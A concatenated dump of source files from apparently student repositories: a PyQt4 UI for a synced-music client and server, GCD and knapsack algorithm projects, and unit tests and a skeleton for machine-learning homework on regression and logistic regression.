lblServer.setBuddy(self.txtServer)
self.btnConnect = QtGui.QPushButton("&Connect")
self.txtServer.returnPressed.connect(self.btnConnect.click)
layoutServerSelection.addWidget(lblServer)
layoutServerSelection.addWidget(self.txtServer)
layoutServerSelection.addWidget(self.btnConnect)
self.addLeftSide(frmServerSelection)
frmControls = QtGui.QGroupBox("Controls", self)
layoutControls = QtGui.QHBoxLayout(frmControls)
self.btnResync = QtGui.QPushButton("&Resync", frmControls)
layoutControls.addWidget(self.btnResync)
self.addLeftSide(frmControls)
frmSettings = QtGui.QGroupBox("Settings", self)
layoutSettings = QtGui.QVBoxLayout(frmSettings)
self.swOffset = ui.SecondsWidget(self, "&Offset:", range=(-60.0, +60.0), step=0.010)
layoutSettings.addWidget(self.swOffset)
self.lsTimerRingSize = ui.LabeledSpinner(self, "Timer ring size:", QtGui.QSpinBox)
self.lsTimerRingSize.setRange(0, 100000)
self.lsTimerRingSize.setValue(200)
self.lsTimerRingSize.setSingleStep(10)
layoutSettings.addWidget(self.lsTimerRingSize)
self.addLeftSide(frmSettings)
self.setWindowTitle("Client - SyncedMusic")
self.txtServer.setFocus()
```
#### File: core/server/ui.py
```python
import sys
from PyQt4 import QtCore, QtGui
from ..util import log, metrix, ui
import pyaudio
class Widget(ui.Widget):
def setup(self):
frmControls = QtGui.QGroupBox("Controls", self)
layoutControls = QtGui.QHBoxLayout(frmControls)
self.btnResync = QtGui.QPushButton("&Resync", frmControls)
lblDevice = QtGui.QLabel("&Sound device:", frmControls)
lblDevice.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.cmbDevice = QtGui.QComboBox(frmControls)
lblDevice.setBuddy(self.cmbDevice)
layoutControls.addWidget(self.btnResync)
layoutControls.addWidget(lblDevice)
layoutControls.addWidget(self.cmbDevice)
self.addLeftSide(frmControls)
paHandler = pyaudio.PyAudio()
for i in xrange(paHandler.get_device_count()):
deviceInfo = paHandler.get_device_info_by_index(i)
self.logger.info("Devices: %s", str(deviceInfo))
self.cmbDevice.addItem(deviceInfo["name"])
self.cmbDevice.setCurrentIndex(paHandler.get_default_input_device_info()["index"])
paHandler.terminate()
frmSettings = QtGui.QGroupBox("Settings", self)
layoutSettings = QtGui.QVBoxLayout(frmSettings)
self.swTimestampInterval = ui.SecondsWidget(self, "&Time stamp interval:", range=(0.0,60.0), step=0.1)
layoutSettings.addWidget(self.swTimestampInterval)
self.swChunkInterval = ui.SecondsWidget(self, "&Chunk interval:", range=(0.0,3600.0), step=0.1)
layoutSettings.addWidget(self.swChunkInterval)
self.swPlayChunkDelay = ui.SecondsWidget(self, "&Play chunk delay:", range=(0.0,3600.0), step=0.1)
layoutSettings.addWidget(self.swPlayChunkDelay)
self.lsTimerRingSize = ui.LabeledSpinner(self, "Timer ring size:", QtGui.QSpinBox)
self.lsTimerRingSize.setRange(0, 100000)
self.lsTimerRingSize.setValue(200)
self.lsTimerRingSize.setSingleStep(10)
layoutSettings.addWidget(self.lsTimerRingSize)
self.swTimestampInterval.setValue(0.4)
self.swChunkInterval.setValue(1.0)
self.swPlayChunkDelay.setValue(2.0)
self.addLeftSide(frmSettings)
self.setWindowTitle("Server - SyncedMusic")
```
#### File: core/util/audio.py
```python
import pyaudio
# Mostly synced-music is written to be rather robust in the sense that server and client don't have to
# have many variables that should be set according to each other. Most of the configurable values are
# rather free to set on both sides with the other side mostly adapting to it. Including the port in network.py
# this is also an exception.
# Sound constants
SAMPLE_FORMAT = pyaudio.paInt16
SAMPLE_RATE = 44100
CHANNELS = 2
def bytesToSeconds(bytes):
return float(bytes)/CHANNELS/SAMPLE_RATE/pyaudio.get_sample_size(SAMPLE_FORMAT)
def secondsToBytes(seconds):
# must be a multiple of CHANNELS*sample_size (for dropping/cropping. don't mess up the words)
sample_size = pyaudio.get_sample_size(SAMPLE_FORMAT)
exact_bytes = int(seconds*CHANNELS*SAMPLE_RATE*sample_size)
return exact_bytes - exact_bytes % (CHANNELS*sample_size)
```
#### File: core/util/log.py
```python
from PyQt4 import QtGui, QtCore
import sys
import logging
import logging.handlers
# http://stackoverflow.com/questions/12214801/python-print-a-string-as-hex-bytes
def hex(s):
return ":".join("{0:02x}".format(ord(c)) for c in s)
# --
LOG_FORMAT = "%(asctime)s.%(msecs)d %(filename)s:%(lineno)d %(levelname)s :: %(message)s"
DATE_FORMAT = "%d.%m.%Y %H:%M:%S"
LEVELS = {"error": logging.ERROR, "warning": logging.WARN, "info": logging.INFO, "debug": logging.DEBUG}
class TextLog(QtGui.QTreeWidget, logging.Handler):
signalHandle = QtCore.pyqtSignal(logging.LogRecord)
def __init__(self, parent=None):
QtGui.QTreeWidget.__init__(self, parent)
logging.Handler.__init__(self)
headerItem = QtGui.QTreeWidgetItem()
headerItem.setData(0,0, QtCore.QString("Level"))
headerItem.setData(1,0, QtCore.QString("Time"))
headerItem.setData(2,0, QtCore.QString("Location"))
headerItem.setData(3,0, QtCore.QString("PID:TID"))
headerItem.setData(4,0, QtCore.QString("Message"))
self.setHeaderItem(headerItem)
self.setRootIsDecorated(False)
self.setSelectionMode(QtGui.QAbstractItemView.NoSelection)
self.logger = logging.getLogger(__name__)
self.logger.addHandler(self)
self.max_entries = 1000
self.colors = {
logging.DEBUG: QtGui.QColor(200,255,200),
logging.INFO: QtGui.QColor(200,220,255),
logging.WARNING: QtGui.QColor(255,255,200),
logging.ERROR: QtGui.QColor(255,200,200),
logging.CRITICAL: QtGui.QColor(255,100,100)
}
self.filter = None
shortcutCtrlF = QtGui.QShortcut(QtGui.QKeySequence("Ctrl+F"), self)
shortcutCtrlF.activated.connect(self.filterDialog)
shortcutCtrlL = QtGui.QShortcut(QtGui.QKeySequence("Ctrl+L"), self)
shortcutCtrlL.activated.connect(self.levelDialog)
self.signalHandle.connect(self.handleRecord)
def handle(self, record):
self.signalHandle.emit(record)
@QtCore.pyqtSlot(logging.LogRecord)
def handleRecord(self, record):
item = QtGui.QTreeWidgetItem()
item.setData(0,0, QtCore.QString(record.levelname))
item.setData(1,0, QtCore.QString("%s.%d" % (record.asctime, record.msecs)))
item.setData(2,0, QtCore.QString("%s:%d (%s)" % (record.filename, record.lineno, record.pathname)))
item.setData(3,0, QtCore.QString("%d:%d" % (record.process, record.thread)))
item.setData(4,0, QtCore.QString(record.message))
shown = self.filterMatch(item)
for i in xrange(self.columnCount()):
item.setData(i,8, self.colors[record.levelno])
self.addTopLevelItem(item)
if shown:
self.scrollToItem(item)
else:
item.setHidden(True)
while self.topLevelItemCount() > self.max_entries:
self.takeTopLevelItem(0)
@QtCore.pyqtSlot()
def levelDialog(self):
level, ok = QtGui.QInputDialog.getItem(self, "Logging Level", "Choose logging level (for future logs):", [QtCore.QString(level).toUpper() for level in LEVELS.keys()], editable=False)
if ok:
logging.getLogger(__name__).setLevel(LEVELS[str(level.toLower())])
@QtCore.pyqtSlot()
def filterDialog(self):
text, ok = QtGui.QInputDialog.getText(self, "Filter", "Enter part of string to filter (leave empty to disable filtering):", text=(self.filter if self.filter is not None else ""))
if ok:
if len(text) == 0:
self.filter = None
else:
self.filter = str(text)
self.filterAll()
def filterAll(self):
for i in xrange(self.topLevelItemCount()):
item = self.topLevelItem(i)
item.setHidden(not self.filterMatch(item))
def filterMatch(self, item):
if self.filter is None:
return True
else:
searchStr = self.filter.lower().strip()
for columnNo in xrange(self.columnCount()):
data = str(item.data(columnNo,0).toString().toLower())
if searchStr in data:
return True
return False
def __del__(self):
self.logger.removeHandler(self)
QtGui.QTreeWidget.__del__(self)
def setup_logger(logger, lvl, stdout=True):
logger.setLevel(LEVELS[lvl.lower()])
if stdout:
stdoutHandler = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(LOG_FORMAT, DATE_FORMAT)
stdoutHandler.setFormatter(formatter)
logger.addHandler(stdoutHandler)
def getLogger():
return logging.getLogger(__name__)
```
#### File: core/util/metrix.py
```python
from PyQt4 import QtGui, QtCore
from collections import OrderedDict
class Metrix(QtGui.QTreeWidget):
def __init__(self, parent=None, updateInterval=300):
QtGui.QTreeWidget.__init__(self, parent)
self.variables = OrderedDict()
self.treeitems = {}
headerItem = QtGui.QTreeWidgetItem()
headerItem.setData(0,0, "Name")
headerItem.setData(1,0, "Value")
self.setHeaderItem(headerItem)
self.setRootIsDecorated(False)
self.setWordWrap(True)
self.timer = QtCore.QTimer(self)
self.timer.setInterval(updateInterval)
#self.timer.timerEvent = self.update
self.timer.timeout.connect(self.update)
self.timer.start()
def add(self, name, callback):
self.variables[name] = callback
self.treeitems[name] = QtGui.QTreeWidgetItem()
self.treeitems[name].setData(0, 0, QtCore.QString(name))
self.treeitems[name].setData(1, 0, QtCore.QString(repr(callback())))
self.addTopLevelItem(self.treeitems[name])
self.resizeColumnToContents(0)
self.resizeColumnToContents(1)
def remove(self, name):
self.variables.remove(name)
self.removeItemWidget(self.treeitems[name])
del self.treeitems[name]
@QtCore.pyqtSlot()
def update(self, dummy=None):
for name, callback in self.variables.iteritems():
self.treeitems[name].setData(1, 0, repr(callback()))
def getLogger():
return logging.getLogger(__name__)
``` |
{
"source": "jojonium/CS-2223-Algorithms",
"score": 4
} |
#### File: CS-2223-Algorithms/Project 1/Project1.py
```python
import time
def euclid(m, n):
# Input: Two positive integers m and n
# Output: Greatest common divisor of m and n
while n != 0:
r = m % n
m = n
n = r
return m
def integer_check(m, n):
# Input: Two positive integers m and n
# Output: Greatest common divisor of m and n
if m < n:
t = m
else:
t = n
while t >= 0:
if m % t == 0:
if n % t == 0:
return t
t -= 1
def prime_factors(n):
# Input: A positive integer
# Output: All the prime factors of the input
factors = []
d = 2
while d * d <= n:
while n % d == 0:
factors.append(d)
n //= d
d = d + 1
if n > 1:
factors.append(n)
return factors
def middle_school(m, n):
# Input: Two positive integers m and n
# Output: Greatest common divisor of m and n
m_factors = prime_factors(m)
n_factors = prime_factors(n)
common_factors = []
for x in m_factors:
for y in n_factors:
if x == y:
n_factors.remove(y)
common_factors.append(y)
break
out = 1
for z in common_factors:
out = out * z
return out
def eff_gcd(s1, s2):
t0 = time.perf_counter()
gcd = euclid(s1, s2)
t1 = time.perf_counter()
elapsed = t1 - t0
print("\nEuclid Algorithm:\nAnswer: " + str(gcd) + "\nTime elapsed: " + str(elapsed))
t0 = time.perf_counter()
gcd = integer_check(s1, s2)
t1 = time.perf_counter()
elapsed = t1 - t0
print("\nConsecutive Integer Check Algorithm:\nAnswer: " + str(gcd) + "\nTime elapsed: " + str(elapsed))
t0 = time.perf_counter()
gcd = middle_school(s1, s2)
t1 = time.perf_counter()
elapsed = t1 - t0
print("\nMiddle School Method:\nAnswer: " + str(gcd) + "\nTime elapsed: " + str(elapsed))
def main():
error_count = 0
while error_count < 3:
i = input("Input a positive integer: ")
j = input("Input a positive integer: ")
try:
s1 = int(i)
s2 = int(j)
if s1 <= 0 or s2 <= 0:
raise ValueError
eff_gcd(s1, s2)
return 1
except ValueError:
print("Invalid input, try again!\n")
error_count += 1
print("Too many invalid inputs. Goodbye.")
return 0
main()
'''
# Tests
print("Euclid algorithm: 60, 24: " + str(euclid(60, 24)))
print("Euclid algorithm: 20, 25: " + str(euclid(20, 25)))
print("Euclid algorithm: 120, 180: " + str(euclid(120, 180)))
print("Euclid algorithm: 49204, 329012: " + str(euclid(49204, 329012)))
print("Euclid algorithm: 49204, 329012: " + str(euclid(181427400, 25989600)))
print("Euclid algorithm: 129749, 429801: " + str(euclid(129749, 429801)) + "\n")
print("Consecutive Integer Check algorithm: 60, 24: " + str(integer_check(60, 24)))
print("Consecutive Integer Check algorithm: 20, 25: " + str(integer_check(20, 25)))
print("Consecutive Integer Check algorithm: 120, 180: " + str(integer_check(120, 180)))
print("Consecutive Integer Check algorithm: 49204, 329012: " + str(integer_check(49204, 329012)))
print("Consecutive Integer Check algorithm: 181427400, 25989600: " + str(integer_check(181427400, 25989600)))
print("Consecutive Integer Check algorithm: 129749, 429801: " + str(integer_check(129749, 429801)) + "\n")
print("Middle School algorithm: 60, 24: " + str(middle_school(60, 24)))
print("Middle School algorithm: 20, 25: " + str(middle_school(20, 25)))
print("Middle School algorithm: 120, 180: " + str(middle_school(120, 180)))
print("Middle School algorithm: 49204, 329012: " + str(middle_school(49204, 329012)))
print("Middle School algorithm: 181427400, 25989600: " + str(middle_school(181427400, 25989600)))
print("Middle School algorithm: 129749, 429801: " + str(middle_school(129749, 429801)) + "\n")
'''
```
#### File: CS-2223-Algorithms/Project 3/project_3.py
```python
import sys
from getopt import getopt, GetoptError
from itertools import chain, combinations
from time import perf_counter
# Input: list l
# Output: a list that represents a set of all subsets of list l
def power_set(l):
return chain.from_iterable(combinations(l, r) for r in range(len(l) + 1))
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items, and an int 'cap', representing the maximum capacity of the knapsack
# Output: The total value of all items in 'items', if their total weight is less
# than the capacity of the knapsack, or zero if they are too heavy
def conditional_value(items, max_weight):
return sum([x[1] for x in items]) if sum([x[0] for x in items]) <= max_weight else 0
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items; and an int, 'cap', representing the maximum capacity of the knapsack.
# Output: The optimal way to select items, maximizing the total value while keeping
# the total weight below cap, found by exhaustively comparing every possibility.
# The first variable returned is the optimal value, the second variable returned
# is the optimal list of items.
def exhaustive_search(items, cap):
best_value = 0
best_set = []
for candidate in power_set(items):
v = conditional_value(candidate, cap)
if v >= best_value:
best_value = v
best_set = candidate
return best_value, best_set
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items; and an int, 'cap', representing the maximum capacity of the knapsack.
# Output: The optimal way to select items, maximizing the total value while keeping
# the total weight below cap, found by a dynamic programming method. The first
# variable returned is the optimal value, the second variable returned is the
# optimal list of items.
def dynamic(items, cap): # Something is wrong here
# Build the table
n = len(items)
c = [[0 for j in range(cap + 1)] for i in range(n + 1)]
for w in range(cap + 1):
c[0][w] = 0
for i in range(1, n + 1):
c[i][0] = 0
for w in range(1, cap + 1):
wi, vi = items[i - 1][0], items[i - 1][1]
if items[i - 1][0] <= w:
if vi + c[i - 1][w - wi] > c[i - 1][w]:
c[i][w] = vi + c[i - 1][w - wi]
else:
c[i][w] = c[i - 1][w]
else:
c[i][w] = c[i - 1][w]
# Trace the optimal path
i, w, = n, cap
best_set = []
while i > 0 and w > 0:
if c[i][w] != c[i - 1][w]:
best_set.append(items[i - 1])
w -= items[i - 1][0]
i -= 1
return c[n][cap], best_set
stored = {}
# Input: a list 'items' of tuples representing the weight and value, respectively,
# of items; an int, 'cap', representing the maximum capacity of the knapsack; and
# an int, 'n', representing the length maximum index of the list of items we are
# considering.
# Output: The set of items to select, maximizing the total value while keeping
# the total weight below cap, found by a greedy method.
def greedy(items, cap):
sorted_by_ratio = sorted(items, key=lambda item: item[1]/item[0])
sorted_by_ratio.reverse()
used_items = []
total_value = 0
for item in sorted_by_ratio:
if item[0] <= cap:
used_items.append(item)
cap -= item[0]
total_value += item[1]
return total_value, used_items
def eff_es(items, cap):
t0 = perf_counter()
result = exhaustive_search(items, cap)
t1 = perf_counter()
elapsed = t1 - t0
print("\nExhaustive Search:\nBest value: " + str(result[0]) + "\nBest set: " + str(result[1]))
print("Time Elapsed: " + str(elapsed))
def eff_dy(items, cap):
t0 = perf_counter()
result = dynamic(items, cap)
t1 = perf_counter()
elapsed = t1 - t0
print("\nDynamic Programming Method:\nBest value: " + str(result[0]) + "\nBest set: " + str(result[1]))
print("Time Elapsed: " + str(elapsed))
def eff_greedy(items, cap):
t0 = perf_counter()
result = greedy(items, cap)
t1 = perf_counter()
elapsed = t1 - t0
print("\nGreedy Method:\nBest value: " + str(result[0]) + "\nBest set: " + str(result[1]))
print("Time Elapsed: " + str(elapsed))
def main(argv):
try:
opts, args = getopt(argv, ":")
except GetoptError:
print("project_3.py <input filename>")
sys.exit(2)
try:
file = open(args[1], "r")
except IndexError:
file = open("input.txt", "r")
except IOError: # Illegal filename
print("File \"" + argv[1] + "\" not found. Defaulting to \:input.txt\"")
file = open("input.txt", "r")
raw_string = file.read()
lines = raw_string.split('\n')
capacity, l_weights, l_values = int(lines[0]), lines[1].split(','), lines[2].split(',')
items = [] # List of tuples representing (weight, value) of items
for i in range(len(l_weights)):
items.append((int(l_weights[i]), int(l_values[i])))
print("Capacity: " + str(capacity))
print("Item\tWeight\tValue")
for x in range(len(items)):
print(str(x + 1) + "\t\t" + str(items[x][0]) + "\t\t" + str(items[x][1]))
eff_dy(items, capacity)
eff_greedy(items, capacity)
eff_es(items, capacity)
return 0
main(sys.argv)
``` |
{
"source": "jojonium/CS-539-Machine-Learning",
"score": 3
} |
#### File: CS-539-Machine-Learning/homework1/test1.py
```python
from problem1 import *
import numpy as np
import sys
'''
Unit test 1:
This file includes unit tests for problem1.py.
'''
#-------------------------------------------------------------------------
def test_terms_and_conditions():
''' Read and Agree with Terms and Conditions'''
assert Terms_and_Conditions() # require reading and agreeing with Terms and Conditions.
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 1 (10 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.7 or above
assert sys.version_info[1]>=7
#-------------------------------------------------------------------------
def test_least_square():
''' (5 points) least square'''
# a dataset of 3 instances, 2 dimensional features
X = np.array([[ 1.,-1.], # the first instance,
[ 1., 0.], # the second instance
[ 1., 1.]])
y = np.array([1.5,2.5,3.5])
w = least_square(X,y)
assert type(w) == np.ndarray
assert w.shape == (2,)
assert np.allclose(w, [2.5,1.], atol = 1e-2)
for _ in range(20):
p = np.random.randint(2,8)
n = np.random.randint(200,400)
w_true = np.random.random(p)
X = np.random.random((n,p))*10
e = np.random.randn(n)*0.01
y = np.dot(X,w_true) + e
w = least_square(X,y)
assert np.allclose(w,w_true, atol = 0.1)
#-------------------------------------------------------------------------
def test_ridge_regression():
''' (5 points) ridge regression'''
# a dataset of 3 instances, 2 dimensional features
X = np.array([[ 1.,-1.], # the first instance,
[ 1., 0.], # the second instance
[ 1., 1.]])
y = np.array([1.5,2.5,3.5])
w = ridge_regression(X,y)
assert type(w) == np.ndarray
assert w.shape == (2,)
assert np.allclose(w, [2.5,1.], atol = 1e-2)
w = ridge_regression(X,y,alpha = 1000)
assert np.allclose(w, [0.,0.], atol = 1e-2)
for _ in range(20):
p = np.random.randint(2,8)
n = np.random.randint(200,400)
w_true = np.random.random(p)
X = np.random.random((n,p))*10
e = np.random.randn(n)*0.01
y = np.dot(X,w_true) + e
w = ridge_regression(X,y)
assert np.allclose(w,w_true, atol = 0.1)
```
#### File: CS-539-Machine-Learning/homework2/test1.py
```python
from problem1 import *
import sys
import math
from gradient1 import *
import warnings
'''
Unit test 1:
This file includes unit tests for problem1.py.
'''
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 1 (30 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.6 or above
assert sys.version_info[1]>=6
#---------------------------------------------------
def test_compute_z():
''' (2 points) compute_z'''
x = np.array([1., 2.])
w = np.array([0.5, -0.6])
b = 0.2
z = compute_z(x,w,b)
assert np.allclose(z, -0.5, atol = 1e-3)
w = np.array([-0.5, 0.6])
z = compute_z(x,w,b)
assert np.allclose(z, .9, atol = 1e-3)
w = np.array([0.5,-0.6])
x = np.array([ 2., 5. ])
z = compute_z(x,w,b)
assert np.allclose(z, -1.8, atol = 1e-3)
b = 0.5
z = compute_z(x,w,b)
assert np.allclose(z, -1.5, atol = 1e-3)
#---------------------------------------------------
def test_compute_dz_db():
''' (1 points) compute_dz_db'''
for _ in range(20):
p = np.random.randint(2,20)
x = np.random.random(p)
w = np.random.random(p)
b = np.random.random(1)
# analytical gradients
db = compute_dz_db()
# numerical gradients
db_true = check_dz_db(x,w,b)
assert np.allclose(db, db_true, atol=1e-2)
#---------------------------------------------------
def test_compute_dz_dw():
''' (1 points) compute_dz_dw'''
for _ in range(20):
p = np.random.randint(2,20)
x = 2*np.random.random(p)-1
w = 2*np.random.random(p)-1
b = 2*np.random.random(1)[0]-1
# analytical gradients
dw = compute_dz_dw(x)
# numerical gradients
dw_true = check_dz_dw(x,w,b)
assert np.allclose(dw, dw_true, atol=1e-2)
#---------------------------------------------------
def test_compute_a():
''' (2 points) compute_a'''
a =compute_a(0.)
assert np.allclose(a, 0.5, atol = 1e-2)
a =compute_a(1.)
assert np.allclose(a, 0.73105857863, atol = 1e-2)
a = compute_a(-1.)
assert np.allclose(a, 0.26894142137, atol = 1e-2)
a = compute_a(-2.)
assert np.allclose(a, 0.1192029, atol = 1e-2)
a =compute_a(-50.)
assert np.allclose(a, 0, atol = 1e-2)
a =compute_a(50.)
assert np.allclose(a, 1, atol = 1e-2)
z = -1000.
a =compute_a(z)
assert np.allclose(a, 0, atol = 1e-2)
z = 1000.
a =compute_a(z)
assert np.allclose(a, 1, atol = 1e-2)
#---------------------------------------------------
def test_compute_da_dz():
''' (2 points) compute_da_dz'''
a = 0.5
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0.25, atol= 1e-3)
a = 0.3
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0.21, atol= 1e-3)
a = 0.9
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0.09, atol= 1e-3)
a = 0.
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0, atol= 1e-4)
a = 1.
da_dz = compute_da_dz(a)
assert np.allclose(da_dz, 0, atol= 1e-4)
for _ in range(20):
z = 2000*np.random.random(1)-1000
a = compute_a(z)
# analytical gradients
da_dz = compute_da_dz(a)
# numerical gradients
da_dz_true = check_da_dz(z)
assert np.allclose(da_dz, da_dz_true, atol=1e-4)
#---------------------------------------------------
def test_compute_L():
''' (2 points) compute_L'''
L= compute_L(0.,0)
assert np.allclose(L, np.log(2), atol = 1e-3)
L= compute_L(0.,1)
assert np.allclose(L, np.log(2), atol = 1e-3)
warnings.filterwarnings("error")
L= compute_L(1000.,0)
assert np.allclose(L, 1000., atol = 1e-1)
L= compute_L(2000.,0)
assert np.allclose(L, 2000., atol = 1e-1)
L= compute_L(1000.,1)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(2000.,1)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(-1000.,0)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(-2000.,0)
assert np.allclose(L, 0., atol = 1e-1)
L= compute_L(-1000.,1)
assert np.allclose(L, 1000., atol = 1e-1)
L= compute_L(-2000.,1)
assert np.allclose(L, 2000., atol = 1e-1)
#---------------------------------------------------
def test_compute_dL_dz():
''' (2 points) compute_dL_dz'''
dL_dz = compute_dL_dz(0,0)
assert np.allclose(dL_dz, 0.5, atol= 1e-3)
dL_dz = compute_dL_dz(0,1)
assert np.allclose(dL_dz, -0.5, atol= 1e-3)
dL_dz = compute_dL_dz(1000,1)
assert dL_dz == dL_dz # check if dL_dz is NaN (not a number)
assert np.allclose(dL_dz, 0., atol= 1e-3)
dL_dz = compute_dL_dz(1000,0)
assert dL_dz == dL_dz # check if dL_dz is NaN (not a number)
assert np.allclose(dL_dz, 1., atol= 1e-3)
warnings.filterwarnings("error")
dL_dz = compute_dL_dz(-1000,0)
assert np.allclose(dL_dz, 0., atol= 1e-3)
dL_dz = compute_dL_dz(-1000,1)
assert np.allclose(dL_dz, -1., atol= 1e-3)
for _ in range(20):
z = 10*np.random.random(1)[0]-5
y = np.random.randint(2)
# analytical gradients
dz = compute_dL_dz(z,y)
# numerical gradients
dz_true = check_dL_dz(z,y)
assert np.allclose(dz, dz_true, atol=1e-2)
#---------------------------------------------------
def test_compute_dL_db():
''' (2 points) compute_dL_db'''
dL_dz = -2.0
dz_db = 1.0
dL_db = compute_dL_db(dL_dz,dz_db)
dL_db_true = -2.0
assert np.allclose(dL_db, dL_db_true, atol = 1e-3)
#---------------------------------------------------
def test_compute_dL_dw():
''' (2 points) compute_dL_dw'''
dL_dz = -1.0
dz_dw = np.array([1., 2.])
dL_dw = compute_dL_dw(dL_dz, dz_dw)
dL_dw_true =np.array([-1., -2.])
assert np.allclose(dL_dw, dL_dw_true, atol = 1e-3)
dL_dz = 0.5
dz_dw = np.array([2., 3.])
dL_dw = compute_dL_dw(dL_dz, dz_dw)
dL_dw_true =np.array([1., 1.5])
assert np.allclose(dL_dw, dL_dw_true, atol = 1e-3)
#---------------------------------------------------
def test_backward():
''' (1 points) backward'''
warnings.filterwarnings("error")
x = np.array([1., 2.])
y = 1
z = 0
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[-0.5,-1], atol=1e-3)
assert np.allclose(dL_db,-0.5, atol=1e-3)
x = np.array([2., 3., 4.])
y = 1
z = 1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[0,0,0], atol=1e-3)
assert np.allclose(dL_db,0, atol=1e-3)
y = 1
z = -1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[-2,-3,-4], atol=1e-3)
assert np.allclose(dL_db,-1, atol=1e-3)
y = 0
z = -1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[0,0,0], atol=1e-3)
assert np.allclose(dL_db,0, atol=1e-3)
y = 0
z = 1000.
dL_dw, dL_db = backward(x,y,z)
assert np.allclose(dL_dw,[2,3,4], atol=1e-3)
assert np.allclose(dL_db,1, atol=1e-3)
#---------------------------------------------------
def test_update_b():
''' (1 points) update_b'''
b = 0.
dL_db = 2.
b = update_b(b, dL_db, alpha=.5)
b_true = -1.
assert np.allclose(b, b_true, atol = 1e-3)
b = update_b(b, dL_db, alpha=1.)
b_true = -3.
assert np.allclose(b, b_true, atol = 1e-3)
#---------------------------------------------------
def test_update_w():
''' (1 points) update_w'''
w = np.array( [0., 0.])
dL_dw = np.array( [1., 2.])
w = update_w(w,dL_dw, alpha=.5)
w_true = - np.array([0.5, 1.])
assert np.allclose(w, w_true, atol = 1e-3)
w = update_w(w,dL_dw, alpha=1.)
w_true = - np.array([1.5, 3.])
assert np.allclose(w, w_true, atol = 1e-3)
#---------------------------------------------------
def test_train():
''' (5 points) train'''
X = np.array([[0., 1.], # an example feature matrix (4 instances, 2 features)
[1., 0.],
[0., 0.],
[1., 1.]])
Y = np.array([0, 1, 0, 1])
w, b = train(X, Y, alpha=1., n_epoch = 100)
assert w[1] + b <= 0 # x1 is negative
assert w[0] + b >= 0 # x2 is positive
assert b <= 0 # x3 is negative
assert w[0]+w[1] + b >= 0 # x4 is positive
X = np.array([[0., 1.],
[1., 0.],
[0., 0.],
[2., 0.],
[0., 2.],
[1., 1.]])
Y = np.array([0, 0, 0, 1, 1, 1])
w, b = train(X, Y, alpha=0.1, n_epoch = 1000)
assert w[0]+w[1] + b >= 0
assert 2*w[0] + b >= 0
assert 2*w[1] + b >= 0
assert w[0] + b <= 0
assert w[1] + b <= 0
assert b <= 0
#---------------------------------------------------
def test_inference():
''' (1 points) inference'''
x= np.array([1,1])
w = np.array([ 0.5, -0.6])
b = 0.2
y = inference(x, w, b)
assert y==1
x= np.array([0,1])
y= inference(x, w, b )
assert y==0
x= np.array([2,2])
y= inference(x, w, b )
assert y==1
#---------------------------------------------------
def test_predict():
''' (5 points) predict'''
Xtest = np.array([[0., 1.],
[1., 0.],
[2., 2.],
[1., 1.]])
w = np.array([ 0.5, -0.6])
b = 0.2
Y= predict(Xtest, w, b )
assert type(Y) == np.ndarray
assert Y.shape == (4,)
Y_true = np.array([0, 1, 1, 1])
assert np.allclose(Y, Y_true, atol = 1e-2)
n_samples = 200
X = np.loadtxt("X1.csv",delimiter=",",dtype=float)
y = np.loadtxt("y1.csv",delimiter=",",dtype=int)
Xtrain, Ytrain, Xtest, Ytest = X[::2], y[::2], X[1::2], y[1::2]
w,b = train(Xtrain, Ytrain,alpha=.001, n_epoch=1000)
Y = predict(Xtrain, w, b)
accuracy = sum(Y == Ytrain)/(n_samples/2.)
print("Training accuracy:", accuracy)
assert accuracy > 0.9
Y = predict(Xtest, w, b)
accuracy = sum(Y == Ytest)/(n_samples/2.)
print("Test accuracy:", accuracy)
assert accuracy > 0.9
```
#### File: CS-539-Machine-Learning/homework3/problem1.py
```python
import torch as th
import numpy as np
# Note: please don't import any new package. You should solve this problem using only the package(s) above.
#-------------------------------------------------------------------------
'''
Problem 1: Softmax Regression (with PyTorch) (12 points)
In this problem, you will implement the softmax regression for multi-class classification problems.
The main goal of this problem is to get familiar with the PyTorch package for deep learning methods.
-------------------------
Package(s) to Install:
Please install python version 3.7 or above and the following package(s):
* torch (for building deep learning models)
How to Install:
* torch: To install 'torch' using pip, you could type in the terminal:
python3 -m pip install torch
-------------------------
A list of all variables being used in this problem is provided at the end of this file.
'''
#--------------------------
def Terms_and_Conditions():
'''
By submitting this homework or changing this function, you agree with the following terms:
(1) Not sharing your code/solution with any student before and after the homework due. For example, sending your code segment to another student, putting your solution online or lending your laptop (if your laptop contains your solution or your Dropbox automatically copied your solution from your desktop computer and your laptop) to another student to work on this homework will violate this term.
(2) Not using anyone's code in this homework and building your own solution. For example, using some code segments from another student or online resources due to any reason (like too busy recently) will violate this term. Changing other's code as your solution (such as changing the variable names) will also violate this term.
(3) When discussing with any other students about this homework, only discuss high-level ideas or use pseudo-code. Don't discuss about the solution at the code level. For example, two students discuss about the solution of a function (which needs 5 lines of code to solve) and they then work on the solution "independently", however the code of the two solutions are exactly the same, or only with minor differences (variable names are different). In this case, the two students violate this term.
All violations of (1),(2) or (3) will be handled in accordance with the WPI Academic Honesty Policy. For more details, please visit: https://www.wpi.edu/about/policies/academic-integrity/dishonesty
Note: we may use the Stanford Moss system to check your code for code similarity. https://theory.stanford.edu/~aiken/moss/
Historical Data: in one year, we ended up finding 25% of the students in that class violating this term in their homework submissions and we handled ALL of these violations according to the WPI Academic Honesty Policy.
'''
#*******************************************
# CHANGE HERE: if you have read and agree with the term above, change "False" to "True".
Read_and_Agree = True
